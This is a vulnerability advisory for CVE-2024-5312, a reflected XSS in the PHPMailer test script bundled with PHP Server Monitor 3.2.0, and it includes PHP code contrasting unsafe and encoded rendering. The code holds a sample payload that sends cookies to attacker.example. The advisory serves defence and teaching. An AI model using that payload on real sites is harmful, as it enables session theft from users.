PT-2024-35585 · Phpmailer+1

Rafael Pedrero · Published 2024-05-24 · Updated 2024-05-24 · CVE-2024-5312

CVSS v3.1 6.3 Medium
Vector AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Name of the Vulnerable Software and Affected Versions: PHP Server Monitor version 3.2.0
Description: PHP Server Monitor 3.2.0 ships PHPMailer's test script at "/phpservermon-3.2.0/vendor/phpmailer/phpmailer/test script/index.php" inside the web root. The page reflects every visible request parameter back into its HTML output without encoding, so each of those parameters is a reflected cross-site scripting (XSS) vector. An attacker who crafts a URL carrying a script payload and persuades a victim to open it can run JavaScript in the victim's browser in the site's origin, for example to read the session cookie (where it is not marked HttpOnly) or to act on the victim's behalf. The CVSS vector reflects this: no privileges are needed, but the victim must open the link (UI:R).
Recommendations: For PHP Server Monitor 3.2.0, deny web access to the vendored PHPMailer test script until a fixed release is available; the script is a development aid with no role in a production deployment, and the whole /vendor/ tree can normally be denied at the web server since the application does not need to expose it. Until the endpoint is blocked, do not open links to it that carry parameters, and mark the session cookie HttpOnly so that a successful injection cannot simply read it.
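The following is an added illustration of the pattern the advisory describes, not code from PHP Server Monitor or from PHPMailer's test script: request parameters echoed into a form unencoded (reflected XSS) beside a hardened version that encodes each value for its HTML context, plus an in-script guard that refuses to serve a development-only page from a web SAPI unless the deployment opts in. The parameter names ("to", "subject") and the PHPMAILER_TEST_PAGE_ENABLED constant are assumptions made for the example.

```php
<?php
// Added illustration; not code from PHP Server Monitor or from PHPMailer's
// test script. Parameter names and the PHPMAILER_TEST_PAGE_ENABLED constant
// are assumptions for this example.

declare(strict_types=1);

// Vulnerable: every request parameter is written into the page as-is, so a
// link like index.php?to=%3Cscript%3E...%3C/script%3E executes the payload in
// the browser of whoever opens it, in the site's origin.
function renderFormUnsafe(array $query): string
{
    $html = '';
    foreach ($query as $name => $value) {
        $html .= '<label>' . $name . '</label>'
               . '<input name="' . $name . '" value="' . $value . '">' . "\n";
    }
    return $html;
}

// Hardened: each request-derived string is HTML-encoded for the context it
// is placed in. ENT_QUOTES also encodes single quotes, which matters inside
// attribute values; the explicit charset avoids encoding mismatches.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderFormSafe(array $query): string
{
    $html = '';
    foreach ($query as $name => $value) {
        $n = esc((string) $name);
        $v = esc((string) $value);
        $html .= '<label>' . $n . '</label>'
               . '<input name="' . $n . '" value="' . $v . '">' . "\n";
    }
    return $html;
}

// Access guard for a development-only page: serve it from the CLI, or from
// the web only when the deployment opts in explicitly. Denying /vendor/ at
// the web server is the stronger control; this is defence in depth for
// installs where that rule is missing.
function testPageAllowed(string $sapi, bool $optIn): bool
{
    return $sapi === 'cli' || $optIn;
}

if (!testPageAllowed(PHP_SAPI, defined('PHPMAILER_TEST_PAGE_ENABLED'))) {
    http_response_code(403);
    exit('This test page is not available on this host.');
}

// Constructed malicious query, as it would arrive from a crafted link.
$query = [
    'to'      => '"><script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'subject' => 'hello',
];

echo "--- vulnerable output ---\n", renderFormUnsafe($query);
echo "--- hardened output ---\n", renderFormSafe($query);
```

Run it with `php` from the command line: the vulnerable output closes the attribute and emits a live `<script>` element, while the hardened output keeps the same text as inert `&quot;&gt;&lt;script&gt;...` inside the attribute. The guard only demonstrates the "restrict access" recommendation at the application layer; on a production host the vendored test script should not be reachable at all.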

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2024-5312
GHSA-RQ7F-J68F-MQH3

Affected Products

Php Server Monitor
Phpmailer